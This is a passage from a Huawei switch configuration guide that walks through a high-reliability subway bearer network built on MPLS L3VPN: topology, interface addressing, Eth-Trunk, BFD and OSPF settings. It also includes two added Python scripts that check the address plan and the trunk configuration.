In this document, the application of S series agile switches on the agile network in the
education industry is taken as an example to describe the application and key configurations
of agile features of agile switches.

l Wired and wireless convergence


Agile switches have native AC cards installed to converge wired and wireless networks
into one network, simplifying the configuration and maintenance of wired and wireless
networks. The high switching capability and scalability of agile switches eliminate
bottlenecks in centralized traffic forwarding when independent ACs or AC cards are
used.
l Free mobility
Free mobility enables the unified management of users' identity information on the entire
network. It ensures that a user can have the same network access rights and enjoy the
same service experience when using different IP addresses to access the network from
different locations.
l SVF
The SVF technology virtualizes core, aggregation, and access switches on a network into
one super switch. The core switch uniformly delivers configurations to and manages
aggregation and access switches.
l iPCA
iPCA collects statistics on the packets that each device sends and forwards on one or
more paths. If a packet is lost, eSight immediately detects the loss and locates where the
packet was lost. iPCA provides real-time monitoring of real service traffic.
The agile features of S series switches are being developed and optimized. In the future, S
series switches will be more widely used on agile networks.

2.5 Example for Configuring High-Speed Self Recovery on a Subway Bearer Network

2.5.1 Service Requirements and Solution Description


This section describes the service requirements of a rail transit bearer network and the
Hierarchy of VPN (HoVPN)-based High-Speed Self Recovery (HSR) solution.

Service Requirements
Economic and social development has made the subway a major way to avoid traffic
congestion in cities. A more diverse range of IP services and increasing data traffic
require a highly secure and reliable subway public transportation system. The legacy subway
bearer network can no longer meet these requirements, and a digital subway system needs a
more robust and reliable bearer network. A modernized subway bearer network must meet the
following requirements:
l Ensures high reliability and security: Subways belong to the public transportation
system, requiring the subway bearer network to be reliable and secure.
l Provides sufficient data capacity: The subway system has high passenger traffic and
increasing data terminals, requiring the subway bearer network to provide sufficient data
capacity and data switching capacity.
l Supports a diverse range of service types: The subway system involves different service
types such as the control system, advertising media, and daily office, requiring the
subway bearer network to support a diverse range of service types.
The IP data communication network is the mainstream data communication network, supports
various access modes, and scales to large networks. Constructing an IP-based subway bearer
network has become the trend.

Huawei offers the HoVPN-based HSR solution to implement secure and reliable subway
system operation and to support the subway system's diverse service types. The HSR
solution uses Huawei agile switches to construct a hierarchical network based on MPLS
L3VPN technology, provides strong service support and simple, flexible networking, and
is suitable for large-scale subway bearer networks. The solution adopts multiple protection
technologies, including hardware bidirectional forwarding detection (BFD), TE hot standby
(HSB), VPN fast reroute (FRR), and traffic forwarding on the Virtual Router Redundancy
Protocol (VRRP) backup device, and provides protection switchovers within milliseconds so
that an end-to-end link switchover completes without being noticed by users.

Overview
The Hierarchy of VPN (HoVPN)-based High-Speed Self Recovery (HSR) solution is
designed to ensure network reliability, scalability, maintainability, and multi-service
supporting capability, provide a hierarchical network structure, and reduce networking costs.
Figure 2-14 shows the network topology in the HSR solution.

Figure 2-14 Network topology

(Diagram not reproduced. Core_SPE1, Core_SPE2, and Core_SPE3 form the core ring. The
data center site (Site1_UPE1 and Site1_UPE2, with CE1 in vpna), metro site 1 (Site2_UPE3
and Site2_UPE4, with CE2 in vpna), and metro site 2 (Site3_UPE5 and Site3_UPE6, with CE3
in vpna) are each dual-homed to the core ring; TE HSB and VPN FRR protect the UPE-to-core
paths, VPN FRR also runs between the core switches, and BFD for VRRP runs between the two
UPEs of each site.)

In Figure 2-14,
l Three S9700 switches are fully connected on the core layer to form a core ring, while the
data center site and two subway sites exchange data across the core ring.
l Two S5720HIs are deployed as aggregation switches in each subway site and form
square networking with two S9700s on the core ring. Alternatively, S5720HIs in multiple
sites are connected in serial networking and then form square networking with two
S9700s on the core ring. VRRP is configured on the S5720HIs so that they function as the
user gateways of each subway site. The data center site uses two S9700s as aggregation
switches and runs the same services as the S5720HIs.
l Layer 2 switches are deployed on the access layer in each site to form an access ring and
are dual-homed to two S5720HIs in subway sites or two S9700s in the data center site.
This network transmits all service traffic of the subway system, including traffic of routine
office, advertising media, and train control management.

Service Deployment

Table 2-12 Service deployment

IGP
    Use OSPF as the IGP between aggregation and core switches so that these switches are
    reachable through routes, and set up Multiprotocol Label Switching (MPLS) Label
    Distribution Protocol (LDP) and MPLS Traffic Engineering (TE) over OSPF routes.
BGP
    Deploy Multiprotocol Border Gateway Protocol (MP-BGP) to set up L3VPN tunnels over
    MP-BGP routes. Establish Internal BGP (IBGP) neighbor relationships between aggregation
    and core switches, and between core switches, and advertise VPN routes.
Routing policy
    Use routing policies to set the preferred value and community attribute to filter,
    select, and back up routes.
MPLS LDP
    Run LDP between aggregation and core switches to transmit L3VPN data on LDP links for
    label switching. Configure BFD for label switched paths (LSPs) to implement fast link
    switchovers.
MPLS TE
    Deploy MPLS TE tunnels to transmit L3VPN traffic: establish primary and backup TE tunnels
    between each S5720HI and its directly connected S9700, and between each S9700 and its
    directly connected S5720HI. Enable TE HSB and configure BFD for TE HSB so that traffic is
    switched from a faulty primary TE tunnel to the backup TE tunnel within 50 ms.
L3VPN
    Configure different VPNs for services such as daily office, advertising media, and train
    control management to isolate these services. In this scenario, one VPN is configured as
    an example.
BFD
    Use BFD on each node to detect faults and implement fast traffic switchovers. In this
    example, BFD for VRRP, BFD for LSP, and BFD for TE are all deployed to complete
    end-to-end switchovers within 50 ms.
TE HSB
    Establish bidirectional TE tunnels between S5720HI aggregation switches and S9700 core
    switches, and deploy HSB for MPLS TE tunnels to provide primary and backup
    constraint-based routed label switched paths (CR-LSPs) for each TE tunnel. Configure BFD
    for CR-LSP to detect CR-LSP faults quickly. When the primary CR-LSP fails, L3VPN traffic
    is switched to the backup CR-LSP, providing end-to-end traffic protection.
Hybrid fast reroute (FRR)
    Enable IP+VPN hybrid FRR on the S5720HIs. When the downlink access link fails, the
    connected interface on one S5720HI detects the fault and switches traffic to the peer
    S5720HI, which then forwards the traffic to the access devices.
VRRP
    Deploy VRRP between the two S5720HIs to provide gateway backup for access users.
    Configure BFD for VRRP to speed up fault detection, VRRP convergence, and traffic
    switchovers. To prevent traffic loss caused by aggregation switch faults and shorten
    service interruptions, also configure the VRRP backup device to forward service traffic.

Device Selection and Restrictions

Table 2-13 Device selection and restrictions

Core nodes and data center aggregation nodes
    Use S9706s or S9712s as core nodes and data center aggregation nodes, and install SRUDs
    and X1E LPUs on these switches. To provide high reliability, ensure that:
    l Eth-Trunk member interfaces reside on the same LPU.
    l On the same device, any two interfaces connected to other devices reside on different
      LPUs.
Aggregation nodes in subway sites
    Use S5720HIs as aggregation switches.

Version Mapping

Table 2-14 Version mapping

V200R009C00
    Use S12700s, S9700s, or S7700s as core switches and S5720HIs as aggregation switches.


2.5.2 Basic Configuration


This section describes basic configurations of all devices, including device names, interfaces,
IP addresses, and global Bidirectional Forwarding Detection (BFD).

2.5.2.1 Data Plan

Network Topology
Construct a network based on the topology shown in Figure 2-15, name network devices, and
configure IP addresses for network devices, service interfaces, and user interfaces on the
devices.

Figure 2-15 Network topology

(Diagram not reproduced. Labels recoverable from it: Site1_UPE1 and Site1_UPE2 in the data
center site, each with CE1 (vpna) attached on XGE1/0/4.200; Site3_UPE6 and Site3_UPE5 in
metro site 2, each with CE3 (vpna) attached on XGE0/0/2.100; Site2_UPE3 and Site2_UPE4 in
metro site 1, each with CE2 (vpna) attached on XGE0/0/2.150 and uplinks on XGE0/0/1 and
XGE0/0/4; Core_SPE1, Core_SPE2, and Core_SPE3 on the core ring, with Core_SPE2 XGE5/0/5 and
Core_SPE3 XGE6/0/3 as single-port downlinks. The Eth-Trunk links and their member ports are
listed in Table 2-15, and interface IP addresses in Table 2-16.)

Interface data plan


Table 2-15 and Table 2-16 list Eth-Trunks, local interfaces, and IP addresses of local
interfaces on devices.


Table 2-15 Eth-Trunks

Device Role   Interface Number   Member Interfaces
Core_SPE1     Eth-Trunk4         XGigabitEthernet5/0/4, XGigabitEthernet5/0/5, XGigabitEthernet5/0/6, XGigabitEthernet5/0/7
              Eth-Trunk5         XGigabitEthernet1/0/0, XGigabitEthernet1/0/1, XGigabitEthernet1/0/2, XGigabitEthernet1/0/3
              Eth-Trunk17        XGigabitEthernet6/0/0, XGigabitEthernet6/0/1, XGigabitEthernet6/0/2, XGigabitEthernet6/0/3
Core_SPE2     Eth-Trunk4         XGigabitEthernet6/0/4, XGigabitEthernet6/0/5, XGigabitEthernet6/0/6, XGigabitEthernet6/0/7
              Eth-Trunk2         XGigabitEthernet3/0/4, XGigabitEthernet3/0/5, XGigabitEthernet3/0/6, XGigabitEthernet3/0/7
              Eth-Trunk17        XGigabitEthernet5/0/0, XGigabitEthernet5/0/1, XGigabitEthernet5/0/2, XGigabitEthernet5/0/3
Core_SPE3     Eth-Trunk5         XGigabitEthernet1/0/0, XGigabitEthernet1/0/1, XGigabitEthernet1/0/2, XGigabitEthernet1/0/3
              Eth-Trunk2         XGigabitEthernet2/0/4, XGigabitEthernet2/0/5, XGigabitEthernet2/0/6, XGigabitEthernet2/0/7
Site1_UPE1    Eth-Trunk17        XGigabitEthernet1/0/0, XGigabitEthernet1/0/1, XGigabitEthernet1/0/2, XGigabitEthernet1/0/3
              Eth-Trunk7         XGigabitEthernet4/0/4, XGigabitEthernet4/0/5, XGigabitEthernet4/0/6, XGigabitEthernet4/0/7
Site1_UPE2    Eth-Trunk17        XGigabitEthernet6/0/0, XGigabitEthernet6/0/1, XGigabitEthernet6/0/2, XGigabitEthernet6/0/3
              Eth-Trunk7         XGigabitEthernet6/0/4, XGigabitEthernet6/0/5, XGigabitEthernet6/0/6, XGigabitEthernet6/0/7
Table 2-16 Local Interfaces and IP Addresses

Device Role   Local Interface            IP Address         Interface Description
Core_SPE1     LoopBack1                  172.16.0.5/32      -
              Eth-Trunk4                 172.17.4.8/31      Core_SPE1 to Core_SPE2
              Eth-Trunk5                 172.17.4.2/31      Core_SPE1 to Core_SPE3
              Eth-Trunk17                172.17.4.10/31     Core_SPE1 to Site1_UPE1
              XGigabitEthernet6/0/4      172.17.10.2/31     Core_SPE1 to Site3_UPE6
Core_SPE2     LoopBack1                  172.16.0.3/32      -
              Eth-Trunk4                 172.17.4.9/31      Core_SPE2 to Core_SPE1
              Eth-Trunk2                 172.17.4.0/31      Core_SPE2 to Core_SPE3
              Eth-Trunk17                172.17.4.12/31     Core_SPE2 to Site1_UPE2
              XGigabitEthernet5/0/5      172.16.8.178/31    Core_SPE2 to Site2_UPE3
Core_SPE3     LoopBack1                  172.16.0.4/32      -
              Eth-Trunk5                 172.17.4.3/31      Core_SPE3 to Core_SPE1
              Eth-Trunk2                 172.17.4.1/31      Core_SPE3 to Core_SPE2
              XGigabitEthernet6/0/1      172.16.8.213/31    Core_SPE3 to Site3_UPE5
              XGigabitEthernet6/0/3      172.16.8.183/31    Core_SPE3 to Site2_UPE4
Site1_UPE1    LoopBack1                  172.16.2.51/32     -
              Eth-Trunk17                172.17.4.11/31     Site1_UPE1 to Core_SPE1
              Eth-Trunk7                 172.17.4.14/31     Site1_UPE1 to Site1_UPE2
              XGigabitEthernet1/0/4.200  172.18.200.66/26   Site1_UPE1 to CE1
Site1_UPE2    LoopBack1                  172.16.2.50/32     -
              Eth-Trunk17                172.17.4.13/31     Site1_UPE2 to Core_SPE2
              Eth-Trunk7                 172.17.4.15/31     Site1_UPE2 to Site1_UPE1
              XGigabitEthernet1/0/4.200  172.18.200.67/26   Site1_UPE2 to CE1
Site2_UPE3    LoopBack1                  172.16.2.75/32     -
              XGigabitEthernet0/0/1      172.16.8.179/31    Site2_UPE3 to Core_SPE2
              XGigabitEthernet0/0/4      172.16.8.180/31    Site2_UPE3 to Site2_UPE4
              XGigabitEthernet0/0/2.150  172.18.150.2/26    Site2_UPE3 to CE2
Site2_UPE4    LoopBack1                  172.16.2.76/32     -
              XGigabitEthernet0/0/1      172.16.8.182/31    Site2_UPE4 to Core_SPE3
              XGigabitEthernet0/0/4      172.16.8.181/31    Site2_UPE4 to Site2_UPE3
              XGigabitEthernet0/0/2.150  172.18.150.3/26    Site2_UPE4 to CE2
Site3_UPE5    LoopBack1                  172.16.2.87/32     -
              XGigabitEthernet0/0/4      172.16.8.212/31    Site3_UPE5 to Core_SPE3
              XGigabitEthernet0/0/1      172.17.10.0/31     Site3_UPE5 to Site3_UPE6
              XGigabitEthernet0/0/2.100  172.18.100.2/26    Site3_UPE5 to CE3
Site3_UPE6    LoopBack1                  172.16.2.86/32     -
              XGigabitEthernet0/0/4      172.17.10.3/31     Site3_UPE6 to Core_SPE1
              XGigabitEthernet0/0/1      172.17.10.1/31     Site3_UPE6 to Site3_UPE5
              XGigabitEthernet0/0/2.100  172.18.100.3/26    Site3_UPE6 to CE3
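Before the addresses in Table 2-16 are typed into nine devices, the plan itself can be checked: each /31 point-to-point link must hold exactly two addresses, one per end, with mirror-image descriptions, and every LoopBack1 must be a unique /32. The following check is an added example, not part of the Huawei document; the tuples transcribe Table 2-16.

```python
"""Consistency check for the interface data plan of Table 2-16 (added example)."""
import ipaddress
from collections import defaultdict

# Transcribed from Table 2-16: (device, local interface, address/prefix, description)
DATA_PLAN = [
    ("Core_SPE1", "LoopBack1", "172.16.0.5/32", "-"),
    ("Core_SPE1", "Eth-Trunk4", "172.17.4.8/31", "Core_SPE1 to Core_SPE2"),
    ("Core_SPE1", "Eth-Trunk5", "172.17.4.2/31", "Core_SPE1 to Core_SPE3"),
    ("Core_SPE1", "Eth-Trunk17", "172.17.4.10/31", "Core_SPE1 to Site1_UPE1"),
    ("Core_SPE1", "XGigabitEthernet6/0/4", "172.17.10.2/31", "Core_SPE1 to Site3_UPE6"),
    ("Core_SPE2", "LoopBack1", "172.16.0.3/32", "-"),
    ("Core_SPE2", "Eth-Trunk4", "172.17.4.9/31", "Core_SPE2 to Core_SPE1"),
    ("Core_SPE2", "Eth-Trunk2", "172.17.4.0/31", "Core_SPE2 to Core_SPE3"),
    ("Core_SPE2", "Eth-Trunk17", "172.17.4.12/31", "Core_SPE2 to Site1_UPE2"),
    ("Core_SPE2", "XGigabitEthernet5/0/5", "172.16.8.178/31", "Core_SPE2 to Site2_UPE3"),
    ("Core_SPE3", "LoopBack1", "172.16.0.4/32", "-"),
    ("Core_SPE3", "Eth-Trunk5", "172.17.4.3/31", "Core_SPE3 to Core_SPE1"),
    ("Core_SPE3", "Eth-Trunk2", "172.17.4.1/31", "Core_SPE3 to Core_SPE2"),
    ("Core_SPE3", "XGigabitEthernet6/0/1", "172.16.8.213/31", "Core_SPE3 to Site3_UPE5"),
    ("Core_SPE3", "XGigabitEthernet6/0/3", "172.16.8.183/31", "Core_SPE3 to Site2_UPE4"),
    ("Site1_UPE1", "LoopBack1", "172.16.2.51/32", "-"),
    ("Site1_UPE1", "Eth-Trunk17", "172.17.4.11/31", "Site1_UPE1 to Core_SPE1"),
    ("Site1_UPE1", "Eth-Trunk7", "172.17.4.14/31", "Site1_UPE1 to Site1_UPE2"),
    ("Site1_UPE1", "XGigabitEthernet1/0/4.200", "172.18.200.66/26", "Site1_UPE1 to CE1"),
    ("Site1_UPE2", "LoopBack1", "172.16.2.50/32", "-"),
    ("Site1_UPE2", "Eth-Trunk17", "172.17.4.13/31", "Site1_UPE2 to Core_SPE2"),
    ("Site1_UPE2", "Eth-Trunk7", "172.17.4.15/31", "Site1_UPE2 to Site1_UPE1"),
    ("Site1_UPE2", "XGigabitEthernet1/0/4.200", "172.18.200.67/26", "Site1_UPE2 to CE1"),
    ("Site2_UPE3", "LoopBack1", "172.16.2.75/32", "-"),
    ("Site2_UPE3", "XGigabitEthernet0/0/1", "172.16.8.179/31", "Site2_UPE3 to Core_SPE2"),
    ("Site2_UPE3", "XGigabitEthernet0/0/4", "172.16.8.180/31", "Site2_UPE3 to Site2_UPE4"),
    ("Site2_UPE3", "XGigabitEthernet0/0/2.150", "172.18.150.2/26", "Site2_UPE3 to CE2"),
    ("Site2_UPE4", "LoopBack1", "172.16.2.76/32", "-"),
    ("Site2_UPE4", "XGigabitEthernet0/0/1", "172.16.8.182/31", "Site2_UPE4 to Core_SPE3"),
    ("Site2_UPE4", "XGigabitEthernet0/0/4", "172.16.8.181/31", "Site2_UPE4 to Site2_UPE3"),
    ("Site2_UPE4", "XGigabitEthernet0/0/2.150", "172.18.150.3/26", "Site2_UPE4 to CE2"),
    ("Site3_UPE5", "LoopBack1", "172.16.2.87/32", "-"),
    ("Site3_UPE5", "XGigabitEthernet0/0/4", "172.16.8.212/31", "Site3_UPE5 to Core_SPE3"),
    ("Site3_UPE5", "XGigabitEthernet0/0/1", "172.17.10.0/31", "Site3_UPE5 to Site3_UPE6"),
    ("Site3_UPE5", "XGigabitEthernet0/0/2.100", "172.18.100.2/26", "Site3_UPE5 to CE3"),
    ("Site3_UPE6", "LoopBack1", "172.16.2.86/32", "-"),
    ("Site3_UPE6", "XGigabitEthernet0/0/4", "172.17.10.3/31", "Site3_UPE6 to Core_SPE1"),
    ("Site3_UPE6", "XGigabitEthernet0/0/1", "172.17.10.1/31", "Site3_UPE6 to Site3_UPE5"),
    ("Site3_UPE6", "XGigabitEthernet0/0/2.100", "172.18.100.3/26", "Site3_UPE6 to CE3"),
]


def check_data_plan(plan):
    """Return a list of findings; an empty list means the plan is consistent."""
    findings = []
    loopbacks = {}                      # loopback address -> owning device
    links = defaultdict(list)           # /31 network -> [(device, description)]
    for device, ifname, cidr, desc in plan:
        iface = ipaddress.ip_interface(cidr)
        if ifname.startswith("LoopBack"):
            if iface.network.prefixlen != 32:
                findings.append(f"{device} {ifname}: loopback {cidr} is not a /32")
            owner = loopbacks.setdefault(iface.ip, device)
            if owner != device:
                findings.append(f"{device} {ifname}: loopback {iface.ip} is already used by {owner}")
        elif iface.network.prefixlen == 31:
            links[iface.network].append((device, desc))
        # /26 CE-facing subinterfaces are shared with the CE and are not link-checked here
    for net, ends in links.items():
        if len(ends) != 2:
            findings.append(f"{net}: expected 2 ends, found {len(ends)}")
            continue
        (dev_a, desc_a), (dev_b, desc_b) = ends
        if desc_a != f"{dev_a} to {dev_b}" or desc_b != f"{dev_b} to {dev_a}":
            findings.append(f"{net}: descriptions {desc_a!r} / {desc_b!r} are not mirror images")
    return findings


if __name__ == "__main__":
    for line in check_data_plan(DATA_PLAN) or ["data plan is consistent"]:
        print(line)
```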

2.5.2.2 Configuring Device Information

Data Plan
NOTE

The data provided in this section is used as an example, which may vary depending on the network scale
and topology.

Configure device information on all devices based on the network topology.

Device information includes the site name, device role, and device number. Each device is
named in the format of AA_BBX.

l AA: indicates the site name, such as Core and Site1.


l BB: indicates the device role, such as SPE, UPE, and CE.
l X: indicates the device number, starting from 1.

For example, Site1_UPE1 indicates a UPE numbered 1 at site 1. The following table
describes the data plan.


Parameter   Value        Description
sysname     Site1_UPE1   Device name.

Procedure
l Configure the device name.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of other devices are similar to the configuration of Site1_UPE1, and are not mentioned
here.
sysname Site1_UPE1

----End

2.5.2.3 Configuring Interfaces

Procedure
Step 1 Add physical interfaces to Eth-Trunks.
The following uses the configuration of Core_SPE1 as an example. The configurations of
other devices are similar to the configuration of Core_SPE1, and are not mentioned here.
#
interface XGigabitEthernet1/0/0
eth-trunk 5
#
interface XGigabitEthernet1/0/1
eth-trunk 5
#
interface XGigabitEthernet1/0/2
eth-trunk 5
#
interface XGigabitEthernet1/0/3
eth-trunk 5
#
interface XGigabitEthernet5/0/4
eth-trunk 4
#
interface XGigabitEthernet5/0/5
eth-trunk 4
#
interface XGigabitEthernet5/0/6
eth-trunk 4
#
interface XGigabitEthernet5/0/7
eth-trunk 4
#
interface XGigabitEthernet6/0/0
eth-trunk 17
#
interface XGigabitEthernet6/0/1
eth-trunk 17
#
interface XGigabitEthernet6/0/2
eth-trunk 17
#
interface XGigabitEthernet6/0/3
eth-trunk 17
#


Step 2 Configure descriptions and IP addresses for interfaces.


The following uses the configuration of Core_SPE1 as an example. The configurations of
other devices are similar to the configuration of Core_SPE1, and are not mentioned here.
#
interface Eth-Trunk4
undo portswitch
description Core_SPE1 to Core_SPE2
ip address 172.17.4.8 255.255.255.254
#
interface Eth-Trunk5
undo portswitch
description Core_SPE1 to Core_SPE3
ip address 172.17.4.2 255.255.255.254
#
interface Eth-Trunk17
undo portswitch
description Core_SPE1 to Site1_UPE1
ip address 172.17.4.10 255.255.255.254
#
interface XGigabitEthernet6/0/4
undo portswitch
description Core_SPE1 to Site3_UPE6
ip address 172.17.10.2 255.255.255.254
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.0.5 255.255.255.255
#

Step 3 Configure Eth-Trunks to function as 40GE interfaces.


Run the least active-linknumber 4 command on the Eth-Trunks of all S9700 switches so that each Eth-Trunk behaves as a single 40GE interface: if any member interface of an Eth-Trunk goes Down, the whole Eth-Trunk goes Down. The following uses the configuration of Core_SPE1 as an example. The configurations of other devices are similar to the configuration of Core_SPE1, and are not mentioned here.
#
interface Eth-Trunk4
least active-linknumber 4
#
interface Eth-Trunk5
least active-linknumber 4
#
interface Eth-Trunk17
least active-linknumber 4
#

Step 4 Create Eth-Trunk load balancing profiles and apply the profiles to Eth-Trunks.
Configure load balancing based on the source and destination port numbers. The following
uses the configuration of Core_SPE1 as an example. The configurations of other devices are
similar to the configuration of Core_SPE1, and are not mentioned here.
#
load-balance-profile CUSTOM
ipv6 field l4-sport l4-dport
ipv4 field l4-sport l4-dport
#
interface Eth-Trunk4
load-balance enhanced profile CUSTOM
#
interface Eth-Trunk5
load-balance enhanced profile CUSTOM
#


interface Eth-Trunk17
load-balance enhanced profile CUSTOM
#

Step 5 Disable STP globally.

All devices on the entire network are connected through Layer 3 interfaces, and Layer 2 loop
prevention protocols are not required. Therefore, disable STP globally. The following uses the
configuration of Core_SPE1 as an example. The configurations of other devices are similar to
the configuration of Core_SPE1, and are not mentioned here.
#
stp disable
#

----End
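Steps 1 to 5 above only give the desired end state; an audit of a device's running configuration against that state is shown below as an added example (not Huawei code). It reproduces Core_SPE1's configuration from this section, generating the twelve trunk members from Table 2-15, and checks the invariants the procedure relies on: least active-linknumber equals the member count so the trunk goes Down as one unit, every Eth-Trunk is a Layer 3 interface with an address, the load-balancing profile it references exists, and STP is disabled only while no Layer 2 interface remains. The VRP default of least active-linknumber 1 is assumed when the command is absent.

```python
"""Audit of the Eth-Trunk and interface configuration of section 2.5.2.3 (added example)."""
from collections import defaultdict

# Step 1 data from Table 2-15: Eth-Trunk number -> member XGigabitEthernet ports
MEMBERS = {
    4: ["5/0/4", "5/0/5", "5/0/6", "5/0/7"],
    5: ["1/0/0", "1/0/1", "1/0/2", "1/0/3"],
    17: ["6/0/0", "6/0/1", "6/0/2", "6/0/3"],
}
STEP1 = "".join(f"#\ninterface XGigabitEthernet{p}\n eth-trunk {t}\n"
                for t, ports in MEMBERS.items() for p in ports)

# Steps 2 to 5 as on the page, merged per interface
STEPS2_5 = """\
#
load-balance-profile CUSTOM
 ipv6 field l4-sport l4-dport
 ipv4 field l4-sport l4-dport
#
interface Eth-Trunk4
 undo portswitch
 description Core_SPE1 to Core_SPE2
 ip address 172.17.4.8 255.255.255.254
 least active-linknumber 4
 load-balance enhanced profile CUSTOM
#
interface Eth-Trunk5
 undo portswitch
 description Core_SPE1 to Core_SPE3
 ip address 172.17.4.2 255.255.255.254
 least active-linknumber 4
 load-balance enhanced profile CUSTOM
#
interface Eth-Trunk17
 undo portswitch
 description Core_SPE1 to Site1_UPE1
 ip address 172.17.4.10 255.255.255.254
 least active-linknumber 4
 load-balance enhanced profile CUSTOM
#
interface XGigabitEthernet6/0/4
 undo portswitch
 description Core_SPE1 to Site3_UPE6
 ip address 172.17.10.2 255.255.255.254
#
stp disable
#
"""
CORE_SPE1_CFG = STEP1 + STEPS2_5


def parse_stanzas(cfg):
    """Split a '#'-separated VRP configuration into {first line: [remaining lines]}."""
    stanzas = {}
    for block in cfg.split("#"):
        lines = [l.strip() for l in block.strip().splitlines() if l.strip()]
        if lines:
            stanzas[lines[0]] = lines[1:]
    return stanzas


def audit_interfaces(cfg):
    """Return a list of findings; an empty list means the configuration matches the procedure."""
    stanzas = parse_stanzas(cfg)
    findings, layer2 = [], []
    members = defaultdict(list)
    profiles = {k.split()[1] for k in stanzas if k.startswith("load-balance-profile ")}
    for head, body in stanzas.items():
        if not head.startswith("interface "):
            continue
        name = head.split()[1]
        trunk = next((int(l.split()[1]) for l in body if l.startswith("eth-trunk ")), None)
        if trunk is not None:
            members[trunk].append(name)          # member ports take the Eth-Trunk's mode
        elif not name.startswith("LoopBack") and (
                "undo portswitch" not in body or not any(l.startswith("ip address ") for l in body)):
            layer2.append(name)                  # still a Layer 2 port: STP would matter here
    for head, body in stanzas.items():
        if not head.startswith("interface Eth-Trunk"):
            continue
        trunk = int(head.rsplit("Eth-Trunk", 1)[1])
        count = len(members[trunk])
        least = next((int(l.split()[-1]) for l in body
                      if l.startswith("least active-linknumber ")), 1)   # VRP default (assumption)
        if count == 0:
            findings.append(f"Eth-Trunk{trunk}: no member interfaces")
        elif least != count:
            findings.append(f"Eth-Trunk{trunk}: least active-linknumber {least} with {count} members; "
                            "the trunk will not go Down as one unit")
        profile = next((l.split()[-1] for l in body
                        if l.startswith("load-balance enhanced profile ")), None)
        if profile is not None and profile not in profiles:
            findings.append(f"Eth-Trunk{trunk}: load-balance profile {profile} is not defined")
    if "stp disable" in stanzas and layer2:
        findings.append("stp disable while Layer 2 interfaces remain: " + ", ".join(layer2))
    return findings


if __name__ == "__main__":
    for line in audit_interfaces(CORE_SPE1_CFG) or ["configuration matches section 2.5.2.3"]:
        print(line)
```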

2.5.2.4 Enabling BFD

Context
To implement protection switching within 50 ms, set the minimum interval at which BFD
packets are sent and received to 3.3 ms. The restraints on switches are as follows:
l For the S12700, the MPU must be an ET1D2MPUA000 card.
l For the S7700 or S9700, the MPU must have an ES0D00FSUA00 card installed or be an
EH1D2SRUDC00/EH1D2SRUDC01 card.
l For the S7706 or S7712, the assign system-resource-mode static command must be run
to set the resource allocation mode to static so that the BFD detection duration can be
controlled within 50 ms.
l For the S5720HI, the set service-mode enhanced command must be run to configure the
switch to work in enhanced mode.

Procedure
l Configure SPEs.

The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
#
bfd
#

l Configure UPEs.

The following uses the configuration of Site1_UPE1 as an example. The configurations


of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
#
bfd
#

----End


2.5.3 Deploying OSPF


Use OSPF as an IGP to ensure that network-wide devices can be reached through routes and
set up MPLS LDP and MPLS TE over OSPF routes.

2.5.3.1 Configuration Roadmap

Figure 2-16 OSPF neighbor relationship diagram

[Figure: the topology of Figure 2-15 with every link between the SPEs (Core_SPE1, Core_SPE2, Core_SPE3) and the UPEs (Site1_UPE1, Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, Site3_UPE6) labelled OSPF; CE1, CE2 and CE3 belong to vpna.]

Configuration Roadmap
Use OSPF as an IGP to ensure that network-wide devices can be reached through routes and
set up MPLS LDP and MPLS TE over OSPF routes. The configuration roadmap is as follows:

1. Add all devices to area 0 and advertise the directly connected network segment and the
address of loopback interface 1.
2. Configure all interfaces that do not run OSPF as OSPF silent interfaces to disable the
interfaces from sending or receiving OSPF packets. The configuration makes the OSPF
network more adaptive and saves network resources.
3. Considering the impact of 31-bit subnet masks, configure the OSPF network type to
point-to-point on the main interconnection interface.
4. Configure synchronization between OSPF and LDP to prevent traffic loss caused by
switchovers of the primary and backup LSPs.

2.5.3.2 Deploying OSPF


Context
Configuring OSPF ensures that user-end provider edges (UPEs) and superstratum provider
edges (SPEs) can be reached through public network routes.

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
router id 172.16.0.5 //Configure a router ID.
#
interface Eth-Trunk4
ospf network-type p2p //Set the OSPF network type to P2P on the interfaces using IP addresses with 31-bit subnet masks.
#
interface Eth-Trunk5
ospf network-type p2p
#
interface Eth-Trunk17
ospf network-type p2p
#
interface XGigabitEthernet6/0/4
ospf network-type p2p
#
ospf 1
silent-interface all //Prohibit all interfaces from receiving and sending OSPF packets.
undo silent-interface Eth-Trunk4 //Allow interfaces to receive and send OSPF packets.
undo silent-interface Eth-Trunk5
undo silent-interface Eth-Trunk17
undo silent-interface XGigabitEthernet6/0/4
spf-schedule-interval millisecond 10 //Set the route calculation interval to 10 ms to speed up route convergence.
lsa-originate-interval 0 //Set the LSA update interval to 0.
lsa-arrival-interval 0 //Set the interval for receiving LSAs to 0 so that topology or route changes can be immediately detected to speed up route convergence.
graceful-restart period 600 //Enable OSPF GR.
flooding-control //Enable flooding-control to stabilize neighbor relationships.
area 0.0.0.0
authentication-mode md5 1 cipher %^%#NInJJ<oF9VXb:BS~~9+JT'suROXkVHNG@8+*3FyB%^%# //Set the authentication mode and password for the OSPF area.
network 172.16.0.5 0.0.0.0
network 172.17.4.2 0.0.0.0
network 172.17.4.8 0.0.0.0
network 172.17.4.10 0.0.0.0
network 172.17.10.2 0.0.0.0
#

l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
router id 172.16.2.51
#
interface Eth-Trunk7
ospf network-type p2p
#


interface Eth-Trunk17
ospf network-type p2p
#
ospf 1
silent-interface all
undo silent-interface Eth-Trunk7
undo silent-interface Eth-Trunk17
graceful-restart period 600
bandwidth-reference 100000 //Set the bandwidth reference value used by the system to calculate the interface cost based on a formula.
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#nU!dUe#c'J!;/%*WtZxQ<gP:'zx_E2OQnML]q;s#%^%#
network 172.16.2.51 0.0.0.0
network 172.17.4.11 0.0.0.0
network 172.17.4.14 0.0.0.0
#

----End
